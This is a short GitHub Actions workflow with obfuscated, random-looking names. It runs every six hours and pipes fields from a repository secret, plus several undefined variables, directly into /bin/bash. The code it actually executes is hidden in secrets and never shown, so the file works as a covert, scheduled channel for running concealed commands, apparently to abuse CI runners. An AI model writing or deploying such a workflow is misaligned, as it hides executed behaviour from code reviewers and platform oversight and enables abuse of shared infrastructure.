name: chickdecent

on:
  workflow_dispatch:
  schedule:
    - cron: '55 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: chickdecent
        env:
          eq2536: ${{ secrets.eq2536 }}
        run: |
          echo $eq2536 | jq -r .jbnf0751 | /bin/bash
          echo $ewxxj9294 | jq -r .az59 | /bin/bash
          echo $wpcbw58 | jq -r .a647 | /bin/bash
          echo $ln2 | jq -r .qzaku59526 | /bin/bash
          echo $gf25132 | jq -r .acx4240 | /bin/bash
          echo $sjwv8395 | jq -r .vezbw48 | /bin/bash
          echo $i0379 | jq -r .jelf558 | /bin/bash
          echo $vg5 | jq -r .julir3 | /bin/bash

